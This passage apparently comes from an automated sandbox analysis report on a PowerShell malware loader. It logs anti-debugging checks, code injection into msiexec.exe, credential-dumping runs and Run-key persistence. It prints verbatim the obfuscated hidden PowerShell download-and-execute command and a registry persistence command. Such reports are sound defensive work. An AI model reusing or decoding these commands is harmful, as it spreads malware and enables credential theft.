Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 18_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle, 18_2_0040DD85
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4925 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4982 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6210 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3568 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe API coverage: 8.3 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3540 Thread sleep time: -2767011611056431s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4600 Thread sleep time: -1844674407370954s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6484 Thread sleep time: -16971000s >= -30000s Jump to behavior
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\msiexec.exe Thread sleep count: Count: 3432 delay: -5 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 18_2_0040AE51 FindFirstFileW,FindNextFileW, 18_2_0040AE51
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 19_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen, 19_2_00407EF8
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 20_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen, 20_2_00407898
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 18_2_00418981 memset,GetSystemInfo, 18_2_00418981
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft Jump to behavior
Source: bhv2369.tmp.18.dr Binary or memory string: https://r.bing.com/rb/18/jnc,nj/6hU_LneafI_NFLeDvM367ebFaKQ.js?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=w
Source: powershell.exe, 00000002.00000002.2297010038.0000014FF9523000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW3018%SystemRoot%\system32\mswsock.dll0
Source: C:\Windows\SysWOW64\msiexec.exe API call chain: ExitProcess graph end node
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging

barindex
Source: C:\Windows\SysWOW64\msiexec.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_04B3D8A4 LdrInitializeThunk,LdrInitializeThunk, 5_2_04B3D8A4
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 18_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle, 18_2_0040DD85
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 18_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW, 18_2_004044A4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exe Jump to behavior
Source: Yara match File source: amsi64_2448.amsi.csv, type: OTHER
Source: Yara match File source: Process Memory Space: powershell.exe PID: 2448, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: powershell.exe PID: 3796, type: MEMORYSTR
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: NULL target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: NULL target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: NULL target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread APC queued: target process: C:\Windows\SysWOW64\msiexec.exe Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\SysWOW64\msiexec.exe base: 40F0000 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden " <#Paremernes duplicature Udvejer Dataservicens Treasury Ostleress Uninterdicted #>;$Cryoscopy='Grusgrav';<#Dubbe Bantustamme Nyvurderende Tripudiate Mitigated #>; function Dark($Misligholdelsers){If ($host.DebuggerEnabled) {$Differentieringens++;}$Sadomasochism=$Cariss+$Misligholdelsers.'Length'-$Differentieringens; for( $Unacute27=4;$Unacute27 -lt $Sadomasochism;$Unacute27+=5){$Unaccommodable=$Unacute27;$Enforth+=$Misligholdelsers[$Unacute27];$Cutireaction='Blomstringstiderne';}$Enforth;}function Nondeclaratively($Budcyklen){ . ($Dolomitternes) ($Budcyklen);}$Skrllede=Dark 'StaiMC clo eftzF stiRagelRi elStyra ogn/Thra ';$Stupiditetens=Dark 'KrypTSvenl PresU ne1 nde2unav ';$Unpliantness=' lus[MashNFldee My T Fal.AnthsD coehistrru dVS stIEngrCBefaeTilgPTortO BogiSangNOpspTMa.iMNonfA awnNSkruASamlgLibeEZygoR lit]Vaga:Sovj:AlecSMyogECuphcP esUGennRDisci C aTSkjuy BasP iggRV.rgo Ga tGonioCam.c.eclOTrevlSvrm= Ven$Net sEndeTconcu.seuptomaiRoveDGoveIFagkT UnmE TraTGastEFravn R.ms Unp ';$Skrllede+=Dark 'Regi5Majo.Mau.0 Opd Simo(Tip WTer iF lgnChrodBusho Priw .orsUnsh j,nsN MolTBuff Fora1Side0Fod ..ast0Ni n;Vilj AnfgW KreieftenMaka6Svir4Unpr;Str, ParxLine6 Uns4.nde;beru beedrAfkavGoat:Gene1 Un 3Sang1 up.Miss0fo m) Mor AandGDiskeRee cturbkMorpo dta/Nive2 Res0Drop1slad0Skuf0Arch1K,nd0.dst1 Ri tetFAeroi ConrStofe ,lifEnteo ,dkxTreu/A,te1V ra3Cod 1 Hdr.Fo r0Etym ';$Signatarmagters=Dark ' reu FyrsBivoe PosRIle - alASneaG WayeIsodN J mTGe e ';$beskftigelsesinteressen=Dark 'Hre hS petTraft nkp Ka,sLoai:Inex/ Co /DowneConivYn leUndesIntaeVerdc TmrrCaroeOlivtPrin.M,timGou aCyl /LokaM,adeigarasRecefAutoo ylbrForlsL.rat,orpa Pina Po e.egil Slfs WifeKbenr RetnReckeRejs. Autp,heesGroum,itr ';$Unacute27mpastoed=Dark 'Volu> Nyt ';$Dolomitternes=Dark 'archiConsEForbX Skr ';$nyhedsbureauernes='Forfatningsdomstol';$Cynography='\Satisfiable.Ins';Nondeclaratively (Dark 'Hort$AmphgSyrilLa gOBo abVaa ASh nL Und:VellsFdsekTestiMassLBys.s We,mSterIStilsstokSHan eSt erGuld1reva8 Rov=Rumi$ FleeGiarNUnsuvCons: efeAT rbPMicrPH lkDSpriAAntiTForsAColi+Unfo$Ges.CFo.lYKam NSta OOp,jgFallR BriA .enpTrasHBarkyHyae ');Nondeclaratively (Dark ' ,ns$LavtgMonsL VinoCharB c aaCatcL D,n:sc,pKSambl regAL ngR ympLSpriAPsy GImmotba.keHortSGdni= par$SavsbMicreDiscSBrackMel FPyr TTilbI,oncGBe oe TimlEnchsBuckEBrneSExosIGaseN,aklTBlgee Ranr R,seChroSUnpesRek,e Eu NDise. DaySFolkpRedelIn biPuckTMed (Rage$PicaUMetaNClamAUdstCPastuA teTAeroE kse2 er7Gt,eMLa,dp.tagAVaans ikoTBarbOPulsEUngrdSamf)Himm ');Nondeclaratively (Dark $Unpliantness);$beskftigelsesinteressen=$Klarlagtes[0];$Kakar=(Dark 'tr.i$Tut g DenlR.adOVrdibCru aWordLs.de:.pkaGSkadROve,uOronnArkidEft V edgOOpfaL.rendFdesE ,roN OmgsPutr= BedNSlamED mpW rad-vapooFeatB IntjP liEKa,scRemstHumi FodbS hiy Ad,SSurrTS.ioESkosmTils. aefNOpbyEWhartLykk. RebW A.se AlbbCommcF rlLAn,eISla,ESam N PieTSeku ');Nondeclaratively ($Kakar);Nondeclaratively (Da Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe" Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Udstiller35" /t REG_EXPAND_SZ /d "%Atlantad% -windowstyle 1 $Dogship=(gp -Path 'HKCU:\Software\Badder\').Trigonocephaly;%Atlantad% ($Dogship)" Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\fdoktovrfxxseixhmgrhbttuogexale" Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\fdoktovrfxxseixhmgrhbttuogexale" Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\fdoktovrfxxseixhmgrhbttuogexale" Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\fdoktovrfxxseixhmgrhbttuogexale" Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\qyucuggstgpeoollwrdamgokovwgtwvpgi" Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\sahvvz" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Udstiller35" /t REG_EXPAND_SZ /d "%Atlantad% -windowstyle 1 $Dogship=(gp -Path 'HKCU:\Software\Badder\').Trigonocephaly;%Atlantad% ($Dogship)" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden " <#paremernes duplicature udvejer dataservicens treasury ostleress uninterdicted #>;$cryoscopy='grusgrav';<#dubbe bantustamme nyvurderende tripudiate mitigated #>; function dark($misligholdelsers){if ($host.debuggerenabled) {$differentieringens++;}$sadomasochism=$cariss+$misligholdelsers.'length'-$differentieringens; for( $unacute27=4;$unacute27 -lt $sadomasochism;$unacute27+=5){$unaccommodable=$unacute27;$enforth+=$misligholdelsers[$unacute27];$cutireaction='blomstringstiderne';}$enforth;}function nondeclaratively($budcyklen){ . ($dolomitternes) ($budcyklen);}$skrllede=dark 'staimc clo eftzf stiragelri elstyra ogn/thra ';$stupiditetens=dark 'kryptsvenl presu ne1 nde2unav ';$unpliantness=' lus[mashnfldee my t fal.anthsd coehistrru dvs stiengrcbefaetilgptorto bogisangnopsptma.imnonfa awnnskruasamlglibeezygor lit]vaga:sovj:alecsmyogecuphcp esugennrdisci c atskjuy basp iggrv.rgo ga tgoniocam.c.eclotrevlsvrm= ven$net sendetconcu.seuptomairovedgoveifagkt unme tratgastefravn r.ms unp ';$skrllede+=dark 'regi5majo.mau.0 opd simo(tip wter if lgnchrodbusho priw .orsunsh j,nsn moltbuff fora1side0fod ..ast0ni n;vilj anfgw kreieftenmaka6svir4unpr;str, parxline6 uns4.nde;beru beedrafkavgoat:gene1 un 3sang1 up.miss0fo m) mor aandgdiskeree cturbkmorpo dta/nive2 res0drop1slad0skuf0arch1k,nd0.dst1 ri tetfaeroi conrstofe ,lifenteo ,dkxtreu/a,te1v ra3cod 1 hdr.fo r0etym ';$signatarmagters=dark ' reu fyrsbivoe posrile - alasneag wayeisodn j mtge e ';$beskftigelsesinteressen=dark 'hre hs pettraft nkp ka,sloai:inex/ co /downeconivyn leundesintaeverdc tmrrcaroeolivtprin.m,timgou acyl /lokam,adeigarasrecefautoo ylbrforlsl.rat,orpa pina po e.egil slfs wifekbenr retnreckerejs. autp,heesgroum,itr ';$unacute27mpastoed=dark 'volu> nyt ';$dolomitternes=dark 'archiconseforbx skr ';$nyhedsbureauernes='forfatningsdomstol';$cynography='\satisfiable.ins';nondeclaratively (dark 'hort$amphgsyrilla gobo abvaa ash nl und:vellsfdsektestimasslbys.s we,msteristilsstokshan est erguld1reva8 rov=rumi$ fleegiarnunsuvcons: efeat rbpmicrph lkdspriaantitforsacoli+unfo$ges.cfo.lykam nsta oop,jgfallr bria .enptrashbarkyhyae ');nondeclaratively (dark ' ,ns$lavtgmonsl vinocharb c aacatcl d,n:sc,pksambl regal ngr ymplspriapsy gimmotba.kehortsgdni= par$savsbmicrediscsbrackmel fpyr ttilbi,oncgbe oe timlenchsbuckebrnesexosigasen,akltblgee ranr r,sechrosunpesrek,e eu ndise. daysfolkpredelin bipucktmed (rage$picaumetanclamaudstcpastua tetaeroe kse2 er7gt,emla,dp.tagavaans ikotbarbopulseungrdsamf)himm ');nondeclaratively (dark $unpliantness);$beskftigelsesinteressen=$klarlagtes[0];$kakar=(dark 'tr.i$tut g denlr.adovrdibcru awordls.de:.pkagskadrove,uoronnarkideft v edgoopfal.rendfdese ,ron omgsputr= bednslamed mpw rad-vapoofeatb intjp lieka,scremsthumi fodbs hiy ad,ssurrts.ioeskosmtils. aefnopbyewhartlykk. rebw a.se albbcommcf rllan,eisla,esam n pietseku ');nondeclaratively ($kakar);nondeclaratively (da
